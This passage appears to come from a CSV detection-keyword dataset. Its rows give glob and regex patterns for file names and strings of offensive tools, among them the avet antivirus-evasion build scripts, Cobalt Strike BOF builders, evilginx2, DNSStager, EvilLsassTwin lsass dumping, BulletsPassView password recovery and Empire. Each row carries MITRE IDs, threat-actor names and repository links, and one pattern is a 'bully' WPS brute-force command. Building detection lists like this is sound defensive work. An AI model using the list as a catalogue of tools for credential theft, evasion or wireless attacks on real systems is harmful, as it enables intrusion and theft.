T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - 
Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","N/A","10","10","27","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z","36354" "*build/evilginx*",".{0,1000}build\/evilginx.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","36355" "*build_40xshikata_revhttpsunstaged_win32.sh*",".{0,1000}build_40xshikata_revhttpsunstaged_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36356" "*build_50xshikata_quiet_revhttps_win32.sh*",".{0,1000}build_50xshikata_quiet_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36357" "*build_50xshikata_revhttps_win32.sh*",".{0,1000}build_50xshikata_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36358" "*build_asciimsf_fromcmd_revhttps_win32.sh*",".{0,1000}build_asciimsf_fromcmd_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. 
as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36359" "*build_asciimsf_revhttps_win32.sh*",".{0,1000}build_asciimsf_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36360" "*build_avetenc_dynamicfromfile_revhttps_win32.sh*",".{0,1000}build_avetenc_dynamicfromfile_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36361" "*build_avetenc_fopen_revhttps_win32.sh*",".{0,1000}build_avetenc_fopen_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. 
For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36362" "*build_avetenc_mtrprtrxor_revhttps_win64.sh*",".{0,1000}build_avetenc_mtrprtrxor_revhttps_win64\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36363" "*build_c_shellcode*",".{0,1000}build_c_shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - 
BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","N/A","10","10","903","142","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z","36364" "*build_c_xor_ipv6(*",".{0,1000}build_c_xor_ipv6\(.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","Black Basta","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","36365" "*build_c_xor_ipv6_dll(*",".{0,1000}build_c_xor_ipv6_dll\(.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","Black Basta","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","36366" "*build_calcfromcmd_50xshikata_revhttps_win32.sh*",".{0,1000}build_calcfromcmd_50xshikata_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. 
For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36367" "*build_calcfrompowersh_50xshikata_revhttps_win32.sh*",".{0,1000}build_calcfrompowersh_50xshikata_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36368" "*build_checkdomain_rc4_mimikatz.sh*",".{0,1000}build_checkdomain_rc4_mimikatz\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36369" "*build_disablewindefpsh_xorfromcmd_revhttps_win64.sh*",".{0,1000}build_disablewindefpsh_xorfromcmd_revhttps_win64\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. 
as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36370" "*build_dkmc_downloadexecshc_revhttps_win32.sh*",".{0,1000}build_dkmc_downloadexecshc_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36371" "*build_downloadbitsadmin_mtrprtrxor_revhttps_win64.sh*",".{0,1000}build_downloadbitsadmin_mtrprtrxor_revhttps_win64\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36372" "*build_downloadbitsadmin_revhttps_win32.sh*",".{0,1000}build_downloadbitsadmin_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. 
which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36373" "*build_downloadcertutil_revhttps_win32.sh*",".{0,1000}build_downloadcertutil_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36374" "*build_downloadcurl_mtrprtrxor_revhttps_win64.sh*",".{0,1000}build_downloadcurl_mtrprtrxor_revhttps_win64\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36375" "*build_golang_xor_ipv6(*",".{0,1000}build_golang_xor_ipv6\(.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","Black Basta","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","36376" "*build_onionpipe.bash*",".{0,1000}build_onionpipe\.bash.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","1","#linux","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","36377" "*build_sleep_rc4_mimikatz.sh*",".{0,1000}build_sleep_rc4_mimikatz\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36378" "*build_svc_20xshikata_bindtcp_win32.sh*",".{0,1000}build_svc_20xshikata_bindtcp_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. 
which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36379" "*build_tor_darwin.bash*",".{0,1000}build_tor_darwin\.bash.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","1","#linux","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","36380" "*build_tor_debian.bash*",".{0,1000}build_tor_debian\.bash.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","1","#linux","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","36381" "*BuildBOFs.exe*",".{0,1000}BuildBOFs\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","N/A","10","10","28","4","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z","36382" "*BuildBOFs.sln*",".{0,1000}BuildBOFs\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic 
Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","N/A","10","10","28","4","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z","36383" "*builder/linpeas_parts/*",".{0,1000}builder\/linpeas_parts\/.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","36384" "*Building ABPTTS configuration *",".{0,1000}Building\sABPTTS\sconfiguration\s.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","N/A","9","8","735","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z","36385" "*Building Evil Lsass Twin*",".{0,1000}Building\sEvil\sLsass\sTwin.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","36386" "*Building Koh BOFs*",".{0,1000}Building\sKoh\sBOFs.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","#content","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","36387" "*Building SYSTEM 
impersonation*",".{0,1000}Building\sSYSTEM\simpersonation.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-MS16032.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","36388" "*BulletsPassView.exe*",".{0,1000}BulletsPassView\.exe.{0,1000}","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals 
the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36390" "*BulletsPassView.zip*",".{0,1000}BulletsPassView\.zip.{0,1000}","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36391" "*BulletsPassView_setup.exe*",".{0,1000}BulletsPassView_setup\.exe.{0,1000}","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. 
you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36392" "*BulletsPassView_x64.exe*",".{0,1000}BulletsPassView_x64\.exe.{0,1000}","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36393" "*bully wlan1mon -b * -c 9 -S -F -B -v 3*",".{0,1000}bully\swlan1mon\s\-b\s.{0,1000}\s\-c\s9\s\-S\s\-F\s\-B\s\-v\s3.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","36394" "*bunny.deb.parrot.sh/*",".{0,1000}bunny\.deb\.parrot\.sh\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. 
